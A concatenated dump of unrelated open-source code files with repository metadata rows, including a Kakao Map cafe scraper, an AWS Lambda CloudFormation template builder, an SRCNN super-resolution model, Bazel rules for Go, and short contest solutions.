shutil.copyfile(PYDICTION_DICT, PYDICTION_DICT_BACKUP)
except IOError as err:
print("Couldn't back up %s. %s" % (PYDICTION_DICT, err))
else:
print('Creating file: "%s"' % PYDICTION_DICT)
if not STDOUT_ONLY:
write_to = open(PYDICTION_DICT, 'a')
main(write_to, module_list)
| rkulla/pydiction | pydiction.py | pydiction.py | py | 9,984 | python | en | code | 279 | github-code | 90 |
73384780457 | # -*- coding: utf-8 -*-
# @Time : 2020/5/29 22:01
# 公众号:Python自动化办公社区
# @File : xpath.py
# @Software: PyCharm
# @Description: 怎么定位网页中的数据?XPath的基本使用。
import requests
from lxml import html
# 获取网页数据
def get_html_data(url):
html_code = requests.get(url)
html_code.encoding = 'utf-8'
html_code = html_code.text
# 格式网站代码的工具
etree_tools = html.etree
# 格式化获取的网站代码
format_html = etree_tools.HTML(html_code)
# 通过@title获取他的title标签里面的内容
li_anchors = format_html.xpath('//*[@class="qzw_articlelist"]//li')
titles = ''
for li in li_anchors:
title = str(li.xpath('./a/text()')[0])
titles += title
return titles | zhaofeng092/python_auto_office | B站/Python爬虫案例实战(2020 · 周更)/x-xpath的使用/xpath.py | xpath.py | py | 796 | python | en | code | 98 | github-code | 90 |
18540383669 | N=int(input())
A=list(map(int,input().split()))
S=[0]
mp={0:1}
for i in range(N):
S.append(S[-1]+A[i])
mp[S[-1]]=mp.get(S[-1],0)+1
ans=0
for i in mp:
ans+=mp[i]*(mp[i]-1)//2
print(ans) | Aasthaengg/IBMdataset | Python_codes/p03363/s019029768.py | s019029768.py | py | 191 | python | en | code | 0 | github-code | 90 |
18297812919 | from sys import stdout
import bisect
printn = lambda x: stdout.write(x)
inn = lambda : int(input())
inl = lambda: list(map(int, input().split()))
inm = lambda: map(int, input().split())
DBG = True # and False
BIG = 999999999
R = 10**9 + 7
def ddprint(x):
if DBG:
print(x)
def f(x):
sm = 0
for i in range(n-1,-1,-1):
j = bisect.bisect_left(a,x-a[i])
sm += n-j
if sm>=m:
return True
return False
n,m = inm()
a = inl()
a.sort()
acc = [0]*(n+1)
for i in range(n-1,-1,-1):
acc[i] = acc[i+1]+a[i]
mn = 2*min(a)
mx = 2*max(a)+1
while mx-mn>=2:
mid = (mx+mn)//2
if f(mid):
mn = mid
else:
mx = mid
# mn is the m-th
# sum and cnt upto mn+1
sm = cnt = 0
for i in range(n):
j = bisect.bisect_left(a,mx-a[i])
sm += acc[j]+(n-j)*a[i]
cnt += n-j
print(sm+mn*(m-cnt))
| Aasthaengg/IBMdataset | Python_codes/p02821/s507276259.py | s507276259.py | py | 862 | python | en | code | 0 | github-code | 90 |
2439307886 | import yaml
import os
import boto3
import time
s3_client = boto3.client('s3')
s3_resource = boto3.resource('s3')
cfn_client = boto3.client('cloudformation')
'''
将错误提取出来写入到notification中
args:
event = {
"version": "20220622",
"commit": "9f2b50e4bc89dd903f85ef1215f0b31079537450",
"publisher": "赵浩博",
"alias": "Current",
"runtime": "dev",
"lambdaArgs": [
{
"stackName": "functionName"
"functionPath": "",
"functionPrefixPath": "",
"buildSpec": "",
"codebuildCfn": "",
"functionName": "",
"branchName": "",
"repoName": "",
"alias": "",
"gitCommit": "",
"gitUrl": ""
}, {...}
],
"stepFunctionArgs": {
"stateMachineName": "functionName + codebuild",
"submitOwner": "",
"s3Bucket": "",
"s3TemplateKey": ""
}
},
return:
{
"manageUrl": manageUrl,
"stackName": stackName
}
}
'''
manageTemplateS3Key = "ph-platform"
manageTemplateS3Path = "2020-11-11/cicd/template/manageTemplate.yaml"
sfnTemplateS3Key = "ph-platform"
sfnTemplateS3Path = "2020-11-11/cicd/template/sfnTemplate.yaml"
TemplateS3Key = "ph-platform"
lmdVersionTemplateS3Path = "2020-11-11/cicd/template/lmdVersion.yaml"
lmdAliasTemplateS3Path = "2020-11-11/cicd/template/lmdAlias.yaml"
resourcePathPrefix = "2020-11-11/cicd/"
manageUrlPrefix = "https://ph-platform.s3.cn-northwest-1.amazonaws.com.cn/2020-11-11/cicd/"
mangeLocalPath = "/tmp/manage.yaml"
sfnLocalPath = "/tmp/sfnTemplate.yaml"
lmdVersionLocalPath = "/tmp/lmdVersion.yaml"
lmdAliasLocalPath = "/tmp/lmdAlias.yaml"
class Ref(object):
def __init__(self, value):
self.value = value
def __repr__(self):
return u"!Ref " + self.value
def deal(self):
return u"!Ref " + self.value
class GetAtt(object):
def __init__(self, value):
self.value = value
def __repr__(self):
return u"!GetAtt " + self.value
def deal(self):
return u"!GetAtt " + self.value
def ref_constructor(loader, node):
value = loader.construct_scalar(node)
value = Ref(value)
return str(value)
def getatt_constructor(loader, node):
value = loader.construct_scalar(node)
value = GetAtt(value)
return str(value)
def upload_s3_file(bucket_name, object_name, file):
s3_client.upload_file(
Bucket=bucket_name,
Key=object_name,
Filename=file
)
def download_s3_file(s3_key, s3_path, local_path):
local_dir_path = "/".join(local_path.split("/")[0:-1])
if not os.path.exists(local_dir_path):
os.makedirs(local_dir_path)
with open(local_path, 'wb') as data:
s3_client.download_fileobj(s3_key, s3_path, data)
def read_yaml_file(file_path):
yaml.add_constructor(u'!Ref', ref_constructor) # 添加代码来构造一个Ref对象
yaml.add_constructor(u'!GetAtt', getatt_constructor) # 添加代码来构造一个Ref对象
with open(file_path, encoding='utf-8') as file:
result = yaml.load(file.read(), Loader=yaml.FullLoader)
return result
def write_yaml_file(result, file_path):
f = open(file_path, "w")
for line in yaml.dump(result):
f.write(line.replace("'", ""))
f.close()
def s3_file_exist(s3_key, s3_path):
result = False
bucket = s3_resource.Bucket(s3_key)
for obj in bucket.objects.filter(Prefix=s3_path):
if obj.key == s3_path:
result = True
return result
def copy_manage_resource(bucket_name, prefix):
copy_source = {
'Bucket': bucket_name,
'Key': prefix + "/manage.yaml"
}
s3_resource.meta.client.copy(copy_source, bucket_name, prefix + "/manage_back.yaml")
def lambda_handler(event, context):
# 从s3下载sfn template文件
download_s3_file(sfnTemplateS3Key, sfnTemplateS3Path, sfnLocalPath)
download_s3_file(TemplateS3Key, lmdAliasTemplateS3Path, lmdAliasLocalPath)
download_s3_file(TemplateS3Key, lmdVersionTemplateS3Path, lmdVersionLocalPath)
# 判断manage.yaml文件是否存在 存在则下载 对此文件进行更改
if s3_file_exist("ph-platform", resourcePathPrefix + event["processor"]["prefix"] + "/manage.yaml"):
download_s3_file("ph-platform", resourcePathPrefix + event["processor"]["prefix"] + "/manage.yaml",
mangeLocalPath)
copy_manage_resource("ph-platform", resourcePathPrefix + event["processor"]["prefix"])
else:
# 如果不存在 从s3下载manage template文件
download_s3_file(manageTemplateS3Key, manageTemplateS3Path, mangeLocalPath)
# 读取manage.yaml文件内容
manage_result = read_yaml_file(mangeLocalPath)
if not manage_result.get("Resources"):
manage_result["Resources"] = {}
if manage_result.get("Transform"):
del manage_result["Transform"]
if manage_result["Resources"].get(event["runtime"].upper() + "PhStateMachine"):
del manage_result["Resources"][event["runtime"].upper() + "PhStateMachine"]
print(manage_result)
# 获取每个function package.yaml的内容
# 获取functionPath拼接出s3路径
for lambdaArg in event["lambdaArgs"]:
functionPath = lambdaArg["functionPath"]
functionName = lambdaArg["functionName"]
package_s3_key = "ph-platform"
package_s3_path = resourcePathPrefix + functionPath + "/package/package.yaml"
package_local_path = "/tmp/cicd/tmp/" + lambdaArg["functionName"] + "/package.yaml"
# 从s3下载yaml文件
download_s3_file(package_s3_key, package_s3_path, package_local_path)
# 写入到manage
package_result = read_yaml_file(package_local_path)
manage_result["Resources"][functionName] = package_result["Resources"]["ATTFFunction"]
if manage_result["Resources"][functionName].get("Metadata"):
del manage_result["Resources"][functionName]["Metadata"]
versionResourcePrefix = lambdaArg["functionName"] + "Version" + event["version"].replace("-", "")
aliasResourcePrefix = lambdaArg["functionName"] + "Alias" + event["version"].replace("-", "")
del_keys = []
for key in manage_result["Resources"].keys():
if key.startswith(versionResourcePrefix) or key.startswith(aliasResourcePrefix):
del_keys.append(key)
if del_keys:
for del_key in del_keys:
del manage_result["Resources"][del_key]
write_yaml_file(manage_result, mangeLocalPath)
manage = open(mangeLocalPath, "a+")
for lambdaArg in event["lambdaArgs"]:
f1 = open(lmdVersionLocalPath, "r")
f2 = open(lmdAliasLocalPath, "r")
versionResourceName = lambdaArg["functionName"] + "Version" + event["version"].replace("-", "") + str(int(round(time.time() * 1000)))
versionAlisaName = lambdaArg["functionName"] + "Alias" + event["version"].replace("-", "")
manage.write(" " + versionResourceName + ":\n")
for line in f1.readlines():
manage.write(line.replace("${ReplaceLmdName}", lambdaArg["functionName"]))
manage.write("\n")
manage.write(" " + versionAlisaName + ":\n")
for line in f2.readlines():
manage.write(line.replace("${ReplaceLmdName}", lambdaArg["functionName"])
.replace("${ReplaceVersionResource}", versionResourceName)
.replace("${ReplaceVersion}", event["version"])
)
manage.write("\n")
f1.close()
# 将sfnTemplate.yaml文件写入到 manage文件中
f3 = open(sfnLocalPath, "r")
manage.write(" " + event["runtime"].upper() + "PhStateMachine:")
manage.write("\n")
for line in f3.readlines():
manage.write(line.replace("${S3Bucket}", event["stepFunctionArgs"]["S3Bucket"])
.replace("${S3TemplateKey}", event["stepFunctionArgs"]["S3TemplateKey"].replace("sm.json", "modify_sm.json"))
.replace("${StateMachineName}", event["stepFunctionArgs"]["StateMachineName"] + "-" + event["runtime"])
.replace("${SubmitOwner}", event["stepFunctionArgs"]["SubmitOwner"])
.replace("${Date}", str(int(round(time.time() * 1000))))
)
manage.write("\n")
manage.write("Transform: AWS::Serverless-2016-10-31")
manage.close()
upload_s3_file(
bucket_name=manageTemplateS3Key,
object_name=resourcePathPrefix + event["processor"]["prefix"] + "/manage.yaml",
file=mangeLocalPath
)
manageUrl = manageUrlPrefix + event["processor"]["prefix"] + "/manage.yaml"
stackName = event["processor"]["stateMachineName"] + "-resource"
return {
"manageUrl": manageUrl,
"stackName": stackName,
"stackParameters": {}
}
| PharbersDeveloper/phlambda | devops/cicd/phcicdupdateasyncmanageyaml/src/main.py | main.py | py | 9,233 | python | en | code | 0 | github-code | 90 |
7893164612 | import cv2
import numpy as np
import torch
import torch.onnx
from torch import nn
class SuperResolutionNet(nn.Module):
def __init__(self, upscale_factor):
super().__init__()
self.upscale_factor = upscale_factor
self.img_upsampler = nn.Upsample(
scale_factor=self.upscale_factor,
mode='bicubic',
align_corners=False)
self.conv1 = nn.Conv2d(3, 64, kernel_size=9, padding=4)
self.conv2 = nn.Conv2d(64, 32, kernel_size=1, padding=0)
self.conv3 = nn.Conv2d(32, 3, kernel_size=5, padding=2)
self.relu = nn.ReLU()
def forward(self, x):
x = self.img_upsampler(x)
out = self.relu(self.conv1(x))
out = self.relu(self.conv2(out))
out = self.conv3(out)
return out
def init_torch_model():
torch_model = SuperResolutionNet(upscale_factor=4)
state_dict = torch.load('srcnn.pth')['state_dict']
# Adapt the checkpoint
for old_key in list(state_dict.keys()):
new_key = '.'.join(old_key.split('.')[1:])
state_dict[new_key] = state_dict.pop(old_key)
torch_model.load_state_dict(state_dict)
torch_model.eval()
return torch_model
model = init_torch_model()
input_img = cv2.imread('face.png').astype(np.float32)
# HWC to NCHW N:batch C:channel H:height W:weight
input_img = np.transpose(input_img, [2, 0, 1]) # transpose()函数的作用是调换数组的行列值的索引值 HWC->CHW
input_img = np.expand_dims(input_img, 0) # 扩展数组的形状,如果axis=0,那么会在最外层加一个[]
# Inference
torch_output = model(torch.from_numpy(input_img)).detach().numpy()
# NCHW to HWC
torch_output = np.squeeze(torch_output, 0) # 删除第0维
torch_output = np.clip(torch_output, 0, 255) # 限制最大值和最小值
torch_output = np.transpose(torch_output, [1, 2, 0]).astype(np.uint8) # int8:0-255
# Show image
cv2.imwrite("face_torch.png", torch_output) # cv2.imwrite() 只能保存 BGR 3通道图像,或 8 位单通道图像、或 PNG/JPEG/TIFF 16位无符号单通道图像
# with torch.no_grad():
# torch.onnx.export(
# model,
# torch.randn(1, 3, 256, 256),
# "srcnn.onnx",
# opset_version=11,
# input_names=['input'],
# output_names=['output'])
| zhiqing66/ONNX_Learn | SRCNN/srcnn.py | srcnn.py | py | 2,301 | python | en | code | 1 | github-code | 90 |
6290680345 |
# - Scrapping information on places
# - Scrapping results from a given query(e.g. "스타벅스").
# - Information including name, address, and working time
# - Data from Kakao map
import numpy as np
import pandas as pd
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver import Keys
import time
import re
driver = webdriver.Chrome(r'C:\Users\usju\Downloads\chromedriver_win32\chromedriver.exe')
driver.get(r'https://map.kakao.com/')
driver.find_element('xpath', '//*[@id="dimmedLayer"]').click()
region = np.array(['강원','세종','경기','경남','대구','광주','대전','부산','울산','인천','전북','제주','충북','경북','서울','전남','충남'])
region_list = []
name_addr_dic = {}
for reg in region:
temp = []
q = reg + ' ' + '투썸플레이스'
driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(q)
driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(Keys.ENTER)
time.sleep(1.5)
try:
ac = ActionChains(driver)
dobogi = driver.find_element('xpath', '//*[@id="info.search.place.more"]')
ac.move_to_element(dobogi)
driver.find_element('xpath', '//*[@id="info.search.place.more"]').click()
time.sleep(1.5)
except:
pass
try:
while True:
for i in range(1, 6):
driver.find_element('xpath', '//*[@id="info.search.page.no{}"]'.format(i)).click()
time.sleep(1.5)
name_list = driver.find_elements('xpath', '//*[@id="info.search.place.list"]/li/div[3]/strong/a[2]')
addr_list = driver.find_elements('xpath', '//*[@id="info.search.place.list"]/li/div[5]/div[2]/p[1]')
for n, a in zip(name_list, addr_list):
name_addr_dic[n.text] = a.text
temp.append(n)
next_button = driver.find_element('xpath', '//*[@id="info.search.page.next"]')
if next_button.get_attribute('class') != 'next disabled':
driver.find_element('xpath', '//*[@id="info.search.page.next"]').click()
time.sleep(1.5)
elif next_button.get_attribute('class') == 'next disabled':
break
except:
pass
for _ in range(len(temp)):
region_list.append(reg)
for _ in range(50):
driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(Keys.BACKSPACE)
n = np.array([])
a = np.array([])
for nn,aa in zip(name_addr_dic.keys(), name_addr_dic.values()):
n = np.append(n,nn)
a = np.append(a,aa)
pd.DataFrame({'name':n, 'address':a}).to_excel(r'atwosomeplace.xlsx')
# -*- 추가 크롤링(영업시간) -*-
name_df = pd.read_excel('twosome_name.xlsx')
driver = webdriver.Chrome(r'C:\Users\usju\Downloads\chromedriver_win32\chromedriver.exe')
driver.get(r'https://map.kakao.com/')
driver.find_element('xpath', '//*[@id="dimmedLayer"]').click()
name = name_df['name'].values
time_table = {}
for i in range(len(name)):
time_get = None
place_name = name[i]
try:
driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(place_name)
driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(Keys.ENTER)
time.sleep(1.5)
driver.find_element('xpath', '//*[@id="info.search.place.list"]/li[1]/div[5]/div[3]/p/a').click()
except:
pass
if len(driver.window_handles) == 1:
try:
for _ in range(30):
driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(Keys.BACKSPACE)
driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(name[i])
driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(Keys.ENTER)
time.sleep(1.5)
driver.find_element('xpath', '//*[@id="info.search.place.list"]/li[1]/div[5]/div[3]/p/a').click()
except:
for _ in range(30):
driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(Keys.BACKSPACE)
try:
time.sleep(1.5)
driver.switch_to.window(driver.window_handles[1])
time_get = driver.find_element('xpath', '//*[@id="mArticle"]/div[1]/div[2]/div[2]/div/div[2]/div/ul').text
driver.close()
driver.switch_to.window(driver.window_handles[0])
except:
pass
if time_get is None:
try:
time.sleep(1.5)
time_get = driver.find_element('xpath', '//*[@id="mArticle"]/div[1]/div[2]/div[2]/div/div/ul/li/span').text
driver.close()
driver.switch_to.window(driver.window_handles[0])
except:
time_get = ''
if len(driver.window_handles) == 2:
driver.close()
driver.switch_to.window(driver.window_handles[0])
time_get = re.sub('\n', '|', time_get)
time_table[name[i]] = time_get
for _ in range(30):
driver.find_element('xpath','//*[@id="search.keyword.query"]').send_keys(Keys.BACKSPACE)
# df['time_table'] = time_table
# df.to_excel(r'20220913_starbucks_finished.xlsx')
name_get = np.array([])
time_get = np.array([])
for k,v in zip(time_table.keys(), time_table.values()):
name_get = np.append(name_get, k)
time_get = np.append(time_get, v)
pd.DataFrame({'name':name_get,'time':time_get}).to_excel('atwosome_time.xlsx')
| WusuhkJu/etc | kakaomap_scrapping.py | kakaomap_scrapping.py | py | 5,602 | python | en | code | 0 | github-code | 90 |
22770276773 | class Solution:
def PrintMinNumber(self, numbers):
# write code here
str_list = []
length = 0
for i in numbers:
str_i = str(i)
length = max(length,len(str_i))
str_list.append(str_i)
full_str_dict = {}
for i in str_list:
str_full = ""
if len(i) < length:
str_full += i[0] * (length-len(i))
str_full += i
if str_full in full_str_dict.keys():
full_str_dict[str_full] += i
else:
full_str_dict[str_full] = i
keys = full_str_dict.keys()
keys = sorted(keys)
all_str = ""
for i in keys:
all_str += full_str_dict[i]
return int(all_str)
u = Solution()
print(u.PrintMinNumber([1,11,111])) | amisyy/leetcode | printMinNumber.py | printMinNumber.py | py | 825 | python | en | code | 0 | github-code | 90 |
18487342249 | n=int(input())
data=[]
for i in range(n):
X,Y,H=map(int,input().split())
data.append([H,X,Y])
data.sort(reverse=True)
for i in range(101):
for j in range(101):
H=abs(data[0][1]-i)+abs(data[0][2]-j)+data[0][0]
for k in range(1,n):
if max(H-abs(data[k][1]-i)-abs(data[k][2]-j),0)==data[k][0]:
continue
else:
break
else:
print(str(i), str(j), str(H))
| Aasthaengg/IBMdataset | Python_codes/p03240/s272785580.py | s272785580.py | py | 453 | python | en | code | 0 | github-code | 90 |
18180679559 | n=int(input())
x=input()
val=int(x,2)
cnt=x.count("1")
p_cnt=cnt+1
m_cnt=cnt-1
p_amari,m_amari=0,0
p_amari=val%(cnt+1)
if cnt-1!=0:
m_amari=val%(cnt-1)
else:
m_amari=0
for i in range(n):
ans=0
if x[i]=="0":
amari=p_amari+pow(2,n-i-1,p_cnt)
amari%=p_cnt
elif x[i]=="1":
if cnt-1==0:
print(0)
continue
amari=m_amari-pow(2,n-i-1,m_cnt)
amari%=m_cnt
ans+=1
while amari!=0:
amari%=bin(amari).count("1")
ans+=1
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p02609/s313746131.py | s313746131.py | py | 475 | python | en | code | 0 | github-code | 90 |
24009078352 | compile_args = {
"opt": [],
"fastbuild": [],
"dbg": ["-race"],
}
build_args = {
"opt": [],
"fastbuild": [],
"dbg": ["-race"],
}
link_args = {
"opt": [
"-w",
"-s",
],
"fastbuild": [
"-w",
"-s",
],
"dbg": ["-race"],
}
link_args_darwin = {
# https://github.com/golang/go/issues/10254
"opt": [
"-w",
],
"fastbuild": [
"-w",
],
"dbg": ["-race"],
}
def replace_prefix(s, prefixes):
for p in prefixes:
if s.startswith(p):
return s.replace(p, prefixes[p], 1)
return s
include_prefix_replacements = {
"-isystem ": "-isystem $PWD/",
"-iquote ": "-iquote $PWD/",
"-I ": "-I $PWD/",
}
def _package_name(ctx):
pkg = ctx.attr._go_package_prefix.go_prefix + ctx.label.package
if ctx.attr.multi_package:
pkg += "/" + ctx.label.name
if pkg.endswith("_go"):
pkg = pkg[:-3]
return pkg
def _construct_go_path(root, package_map):
cmd = ['rm -rf ' + root, 'mkdir ' + root]
for pkg, archive_path in package_map.items():
pkg_dir = '/'.join([root, pkg[:pkg.rfind('/')]])
pkg_depth = pkg_dir.count('/')
pkg_name = pkg[pkg.rfind('/')+1:]
symlink = pkg_dir + '/' + pkg_name + '.a'
cmd += [
'mkdir -p ' + pkg_dir,
'ln -s ' + ('../' * pkg_depth) + archive_path + ' ' + symlink
]
return cmd
def _construct_package_map(packages):
archives = []
package_map = {}
for pkg in packages:
archives += [pkg.archive]
package_map[pkg.name] = pkg.archive.path
return archives, package_map
# TODO(schroederc): remove this if https://github.com/bazelbuild/bazel/issues/539 is ever fixed
def _dedup_packages(packages):
seen = set()
filtered = []
for pkg in packages:
if pkg.name not in seen:
seen += [pkg.name]
filtered += [pkg]
return filtered
def _go_compile(ctx, pkg, srcs, archive, extra_packages=[]):
cgo_link_flags = set([], order="link")
transitive_deps = []
transitive_cc_libs = set()
for dep in ctx.attr.deps:
transitive_deps += dep.go.transitive_deps
cgo_link_flags += dep.go.cgo_link_flags
transitive_cc_libs += dep.go.transitive_cc_libs
transitive_deps += extra_packages
transitive_deps = _dedup_packages(transitive_deps)
archives, package_map = _construct_package_map(transitive_deps)
cc_inputs = set()
cgo_compile_flags = set([], order="compile")
if hasattr(ctx.attr, "cc_deps"):
for dep in ctx.attr.cc_deps:
cc_inputs += dep.cc.transitive_headers
cc_inputs += dep.cc.libs
transitive_cc_libs += dep.cc.libs
cgo_link_flags += dep.cc.link_flags
for lib in dep.cc.libs:
cgo_link_flags += ["$PWD/" + lib.path]
for flag in dep.cc.compile_flags:
cgo_compile_flags += [replace_prefix(flag, include_prefix_replacements)]
gotool = ctx.file._go
if ctx.attr.go_build:
# Cheat and build the package non-hermetically (usually because there is a cgo dependency)
args = build_args[ctx.var['COMPILATION_MODE']]
cmd = "\n".join([
'export CC=' + ctx.var['CC'],
'export CGO_CFLAGS="' + ' '.join(list(cgo_compile_flags)) + '"',
'export CGO_LDFLAGS="' + ' '.join(list(cgo_link_flags)) + '"',
'export GOPATH="$PWD/' + ctx.label.package + '"',
gotool.path + ' build -a ' + ' '.join(args) + ' -o ' + archive.path + ' ' + ctx.attr.package,
])
mnemonic = 'GoBuild'
else:
args = compile_args[ctx.var['COMPILATION_MODE']]
go_path = archive.path + '.gopath/'
cmd = "\n".join(_construct_go_path(go_path, package_map) + [
'if ' + gotool.path + ' tool | grep -q 6g; then TOOL=6g; else TOOL=compile; fi',
gotool.path + " tool $TOOL " + ' '.join(args) + " -p " + pkg + " -complete -pack -o " + archive.path + " " +
'-I "' + go_path + '" ' + cmd_helper.join_paths(" ", set(srcs)),
])
mnemonic = 'GoCompile'
cmd = "\n".join([
'set -e',
'export GOROOT=$PWD/external/local-goroot',
cmd,
])
ctx.action(
inputs = ctx.files._goroot + srcs + archives + list(cc_inputs),
outputs = [archive],
mnemonic = mnemonic,
command = cmd,
use_default_shell_env = True)
return transitive_deps, cgo_link_flags, transitive_cc_libs
def _go_library_impl(ctx):
archive = ctx.outputs.archive
if ctx.attr.package == "":
pkg = _package_name(ctx)
else:
pkg = ctx.attr.package
# TODO(shahms): Figure out why protocol buffer .jar files are being included.
srcs = FileType([".go"]).filter(ctx.files.srcs)
package = struct(
name = pkg,
archive = archive,
)
transitive_deps, cgo_link_flags, transitive_cc_libs = _go_compile(ctx, package.name, srcs, archive)
return struct(
go = struct(
sources = ctx.files.srcs,
package = package,
transitive_deps = transitive_deps + [package],
cgo_link_flags = cgo_link_flags,
transitive_cc_libs = transitive_cc_libs,
),
)
def _link_binary(ctx, binary, archive, transitive_deps, extldflags=[], cc_libs=[]):
gotool = ctx.file._go
for a in cc_libs:
extldflags += [a.path]
dep_archives, package_map = _construct_package_map(transitive_deps)
go_path = binary.path + '.gopath/'
if ctx.var['TARGET_CPU'] == 'darwin':
args = link_args_darwin[ctx.var['COMPILATION_MODE']]
else:
args = link_args[ctx.var['COMPILATION_MODE']]
cmd = ['set -e'] + _construct_go_path(go_path, package_map) + [
'export GOROOT=$PWD/external/local-goroot',
'export PATH',
'if ' + gotool.path + ' tool | grep -q 6l; then TOOL=6l; else TOOL=link; fi',
gotool.path + ' tool $TOOL -extldflags="' + ' '.join(list(extldflags)) + '"'
+ ' ' + ' '.join(args) + ' -L "' + go_path + '"'
+ ' -o ' + binary.path + ' ' + archive.path + ';',
]
ctx.action(
inputs = ctx.files._goroot + [archive] + dep_archives + list(cc_libs),
outputs = [binary],
mnemonic = 'GoLink',
command = "\n".join(cmd),
use_default_shell_env = True)
def binary_struct(ctx, extra_runfiles=[]):
runfiles = ctx.runfiles(
files = [ctx.outputs.executable] + extra_runfiles,
collect_data = True,
)
return struct(
args = ctx.attr.args,
runfiles = runfiles,
)
def _go_binary_impl(ctx):
gotool = ctx.file._go
archive = ctx.new_file(ctx.configuration.bin_dir, ctx.label.name + ".a")
transitive_deps, cgo_link_flags, transitive_cc_libs = _go_compile(ctx, 'main', ctx.files.srcs, archive)
_link_binary(ctx, ctx.outputs.executable, archive, transitive_deps,
extldflags=cgo_link_flags,
cc_libs=transitive_cc_libs)
return binary_struct(ctx)
def _go_test_impl(ctx):
lib = ctx.attr.library
pkg = _package_name(ctx)
# Construct the Go source that executes the tests when run.
test_srcs = ctx.files.srcs
testmain = ctx.new_file(ctx.configuration.genfiles_dir, ctx.label.name + "main.go")
testmain_generator = ctx.file._go_testmain_generator
cmd = (
'set -e;' +
testmain_generator.path + ' ' + pkg + ' ' + testmain.path + ' ' +
cmd_helper.join_paths(' ', set(test_srcs)) + ';')
ctx.action(
inputs = test_srcs + [testmain_generator],
outputs = [testmain],
mnemonic = 'GoTestMain',
command = cmd,
use_default_shell_env = True)
# Compile the library along with all of its test sources (creating the test package).
archive = ctx.new_file(ctx.configuration.bin_dir, ctx.label.name + '.a')
transitive_deps, cgo_link_flags, transitive_cc_libs = _go_compile(
ctx, pkg, test_srcs + lib.go.sources, archive,
extra_packages = lib.go.transitive_deps)
test_pkg = struct(
name = pkg,
archive = archive,
)
transitive_cc_libs += lib.go.transitive_cc_libs
# Compile the generated test main.go source
testmain_archive = ctx.new_file(ctx.configuration.bin_dir, ctx.label.name + "main.a")
_go_compile(ctx, 'main', [testmain] + ctx.files._go_testmain_srcs, testmain_archive,
extra_packages = [test_pkg])
# Link the generated test runner
_link_binary(ctx, ctx.outputs.bin, testmain_archive, transitive_deps + [test_pkg],
extldflags=cgo_link_flags,
cc_libs = transitive_cc_libs)
# Construct a script that runs ctx.outputs.bin and parses the test log.
test_parser = ctx.file._go_test_parser
test_script = [
"#!/bin/bash -e",
'set -o pipefail',
'if [[ -n "$XML_OUTPUT_FILE" ]]; then',
' %s -test.v "$@" | \\' % (ctx.outputs.bin.short_path),
' %s --format xml --out "$XML_OUTPUT_FILE"' % (test_parser.short_path),
'else',
' exec %s "$@"' % (ctx.outputs.bin.short_path),
'fi'
]
ctx.file_action(
output = ctx.outputs.executable,
content = "\n".join(test_script),
executable = True,
)
return binary_struct(ctx, extra_runfiles=[ctx.outputs.bin, test_parser])
base_attrs = {
"srcs": attr.label_list(allow_files = FileType([".go"])),
"deps": attr.label_list(
allow_files = False,
providers = ["go"],
),
"go_build": attr.bool(),
"multi_package": attr.bool(),
"_go_package_prefix": attr.label(
default = Label("//external:go_package_prefix"),
providers = ["go_prefix"],
allow_files = False,
),
"_go": attr.label(
default = Label("//tools/go"),
allow_files = True,
single_file = True,
),
"_goroot": attr.label(
default = Label("//tools/go:goroot"),
allow_files = True,
),
}
go_library = rule(
_go_library_impl,
attrs = base_attrs + {
"cc_deps": attr.label_list(
allow_files = False,
providers = ["cc"],
),
"package": attr.string(),
},
outputs = {"archive": "%{name}.a"},
)
binary_attrs = base_attrs + {
"data": attr.label_list(
allow_files = True,
cfg = DATA_CFG,
),
}
go_binary = rule(
_go_binary_impl,
attrs = binary_attrs,
executable = True,
)
go_test = rule(
_go_test_impl,
attrs = binary_attrs + {
"library": attr.label(providers = ["go"]),
"_go_testmain_generator": attr.label(
default = Label("//tools/go:testmain_generator"),
single_file = True,
),
"_go_test_parser": attr.label(
default = Label("//tools/go:parse_test_output"),
single_file = True,
),
"_go_testmain_srcs": attr.label(
default = Label("//tools/go:testmain_srcs"),
allow_files = FileType([".go"]),
),
},
executable = True,
outputs = {"bin": "%{name}.bin"},
test = True,
)
def go_package(name=None, package=None,
srcs="", deps=[], test_deps=[], test_args=[], test_data=[], cc_deps=[],
tests=True, exclude_srcs=[], go_build=False,
visibility=None):
if not name:
name = PACKAGE_NAME.split("/")[-1]
if srcs and not srcs.endswith("/"):
srcs += "/"
exclude = []
for src in exclude_srcs:
exclude += [srcs+src]
lib_srcs, test_srcs = [], []
for src in native.glob([srcs+"*.go"], exclude=exclude, exclude_directories=1):
if src.endswith("_test.go"):
test_srcs += [src]
else:
lib_srcs += [src]
go_library(
name = name,
srcs = lib_srcs,
deps = deps,
go_build = go_build,
cc_deps = cc_deps,
package = package,
visibility = visibility,
)
if tests and test_srcs:
go_test(
name = name + "_test",
srcs = test_srcs,
library = ":" + name,
deps = test_deps,
args = test_args,
data = test_data,
visibility = ["//visibility:private"],
)
# Configuration rule for go packages
def _go_prefix_impl(ctx):
return struct(go_prefix = ctx.attr.prefix)
go_prefix = rule(
_go_prefix_impl,
attrs = {"prefix": attr.string()},
)
def go_package_prefix(prefix):
if not prefix.endswith("/"):
prefix = prefix + "/"
go_prefix(
name = "go_package_prefix",
prefix = prefix,
visibility = ["//visibility:public"],
)
| google/qrisp | tools/build_rules/go.bzl | go.bzl | bzl | 12,080 | python | en | code | 10 | github-code | 90 |
30933307668 | import datetime
from typing import Any, Dict, List, Type, TypeVar, Union
import attr
from dateutil.parser import isoparse
from ..models.cnh_answer import CNHAnswer
from ..models.documento_answer import DocumentoAnswer
from ..models.endereco_answer import EnderecoAnswer
from ..models.face_answer import FaceAnswer
from ..models.filiacao_answer import FiliacaoAnswer
from ..models.pf_facial_answer_nacionalidade import PFFacialAnswerNacionalidade
from ..models.pf_facial_answer_sexo import PFFacialAnswerSexo
from ..models.pf_facial_answer_situacao_cpf import PFFacialAnswerSituacaoCpf
from ..types import UNSET, Unset
T = TypeVar("T", bound="PFFacialAnswer")
@attr.s(auto_attribs=True)
class PFFacialAnswer:
"""
Attributes:
nome (Union[Unset, str]):
